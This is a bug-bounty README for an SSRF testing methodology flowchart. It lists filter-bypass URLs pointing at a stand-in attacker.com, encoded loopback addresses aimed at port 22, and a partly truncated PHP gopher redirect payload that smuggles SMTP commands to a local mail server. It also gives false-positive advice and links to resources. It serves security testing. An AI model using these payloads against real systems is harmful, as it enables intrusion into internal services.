├── README.md
└── iustinSSRFflowchart.png
/README.md:
--------------------------------------------------------------------------------
1 | # SSRF
2 | ## SSRF Methodology Flowchart
3 | Since I've seen so many people ask what to do once they get a request back to their collaborator instance, I created this flowchart to present what I usually do to test and escalate SSRFs.
4 | ## Disclaimer
5 | I am sure there are a few other ways of bypassing ssrf filters which I did not include, however this flowchart shows the ones I personally test against.
6 | 
7 | ## False Positives:
8 | DNS queries only are rarely exploitable, and should never be reported without any additional impact.
9 |
10 | When using your listener as an email domain `test@burpcollaborator.com`, recieving SMTP + DNS queries are not signs of SSRF. It's just how SMTP works and should never be reported. There's been edge cases where the payload `test@burpcollaborator.com`, lead to http requests. If that's the case, SSRF might be possible. See [d0nut's Piercing the veal](https://medium.com/@d0nut/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5) story 4.
11 | ## Sources:
12 | ### Whitelist filter bypasses
13 | Some common whitelist filter bypasses I test against:
14 | ```
15 | https://target.com@attacker.com
16 | https://attacker.com/target.com
17 | https://target.com.attacker.com
18 | ```
19 | ### Blacklist filter bypasses (decimal, hex, octal)
20 | Inspired from [EdOverflow's blogpost on exploiting Ruby's Resolv](https://edoverflow.com/2017/ruby-resolv-bug/)
21 | ```
22 | http://0177.1:22/
23 | http://0x7f.1:22/
24 | http://127.000.001:22/
25 | ```
26 | See more at [PayloadsAllTheThings SSRF](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
27 |
28 | ### PHP Redirect
29 | The value appended to location will be the url your page will redirect to. You can also play around with different status codes other than 301, such as 302,303,307.
30 | ```
31 |
35 | ```
36 | ### SMPT Gopher payloads
37 | Inspired from [d0nut's Piercing the veal](https://medium.com/@d0nut/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5)
38 | ```
39 | ',
43 | 'RCPT To: ',
44 | 'DATA',
45 | 'Subject: @sxcurity!',
46 | 'Corben was here, woot woot!',
47 | '.'
48 | );
49 |
50 | $payload = implode('%0A', $commands);
51 |
52 | header('Location: gopher://0:25/_'.$payload);
53 | ?>
54 | ```
55 | Payload taken from [PayloadsAllTheThings SSRF](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
56 | ### Exploiting incosistencies in url parsers + DNS Rebdinding
57 | Orange Tsai's blackhat presentation explains this perfectly. (
58 | [PDF slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf) +
59 | [Youtube presentation](https://www.youtube.com/watch?v=R9pJ2YCXoJQ&ab_channel=BlackHat) )
60 | I also highly recommend watching Liveoverflow's video ([PHP include and bypass SSRF protection with two DNS A records ](https://www.youtube.com/watch?v=PKbxK2JH23Y&ab_channel=LiveOverflow)) which discusses url parsing incosistencies, while also touching on DNS Rebinding.
61 | ### More SSRF Resources
62 | [Jdonsec's list of SSRF Resources](https://github.com/jdonsec/AllThingsSSRF)
63 |
--------------------------------------------------------------------------------
/iustinSSRFflowchart.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iustin24/SSRF/c00e09ab2844204dc8019a1375f837e7c973b1aa/iustinSSRFflowchart.png
--------------------------------------------------------------------------------